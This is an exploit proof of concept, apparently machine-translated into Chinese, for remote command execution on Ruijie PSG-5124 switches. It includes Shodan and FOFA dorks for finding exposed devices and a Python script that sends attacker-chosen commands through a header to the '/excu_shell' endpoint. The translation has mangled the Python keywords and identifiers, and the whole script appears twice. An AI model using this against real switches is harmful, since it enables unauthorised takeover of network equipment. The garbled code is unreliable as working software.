#-利用标题: Ruijie Switch PSG-5124 26293-远程代码执行(RCE)
#-Shodan Dork: http.html_hash:-1402735717
#-fofa dork: body='img/free_login_ge.gif'body='。/img/login_bg.gif'
#-利用作者: bittehunter
#-电子邮件:[email protected]
#-版本: PSG-5124(链接软件版本:26293)
# - 在: PSG-5124上测试(链接软件版本:26293)
导入http.client
导入argparse
def send_request(IP,端口,命令):
标题={
'host': f'{ip} : {port}',
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64; X64; rv:121.0)壁虎/20100101 Firefox/121.0',
'Accept':'text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,/; q=0.8',
'Accept-Language':'En-us,en; q=0.5',
'Accept-ongoding':'Gzip,Deflate,br',
'dnt':'1',
'Connection':'关闭',
'升级- 不肯定- 重新要求':'1',
'cmdnum':'1',
'eskenck1':'n',
'content-Length':'0',
'command1':命令
}
TRY:
连接=http.client.httpconnection(f'{ip} : {port}')
connection.request('get','/excu_shell',标头=标题)
响应=connection.getResponse()
打印(f'status code: {response.status}')
print(response.read()。解码('utf-8'))
Connection.Close()
除异常外,E:
打印(f'request Failed: {e}')
如果name=='__ -Main __':
parser=argparse.argumentparser(description='ruijie switches rce的概念证明')
parser.add_argument(' - ip',help='目标ip地址',必需=true)
parser.add_argument(' - port',help='port',必需=true)
parser.add_argument(' - cmd',help='命令',必需=true)
args=parser.parse_args()
ip=args.ip
端口=args.port
命令=args.cmd
send_request(IP,端口,命令)
#-Shodan Dork: http.html_hash:-1402735717
#-fofa dork: body='img/free_login_ge.gif'body='。/img/login_bg.gif'
#-利用作者: bittehunter
#-电子邮件:[email protected]
#-版本: PSG-5124(链接软件版本:26293)
# - 在: PSG-5124上测试(链接软件版本:26293)
导入http.client
导入argparse
def send_request(IP,端口,命令):
标题={
'host': f'{ip} : {port}',
'用户代理:'Mozilla/5.0(Windows NT 10.0; Win64; X64; X64; rv:121.0)壁虎/20100101 Firefox/121.0',
'Accept':'text/html,application/xhtml+xml,application/xml; q=0.9,image/avif,image/webp,/; q=0.8',
'Accept-Language':'En-us,en; q=0.5',
'Accept-ongoding':'Gzip,Deflate,br',
'dnt':'1',
'Connection':'关闭',
'升级- 不肯定- 重新要求':'1',
'cmdnum':'1',
'eskenck1':'n',
'content-Length':'0',
'command1':命令
}
TRY:
连接=http.client.httpconnection(f'{ip} : {port}')
connection.request('get','/excu_shell',标头=标题)
响应=connection.getResponse()
打印(f'status code: {response.status}')
print(response.read()。解码('utf-8'))
Connection.Close()
除异常外,E:
打印(f'request Failed: {e}')
如果name=='__ -Main __':
parser=argparse.argumentparser(description='ruijie switches rce的概念证明')
parser.add_argument(' - ip',help='目标ip地址',必需=true)
parser.add_argument(' - port',help='port',必需=true)
parser.add_argument(' - cmd',help='命令',必需=true)
args=parser.parse_args()
ip=args.ip
端口=args.port
命令=args.cmd
send_request(IP,端口,命令)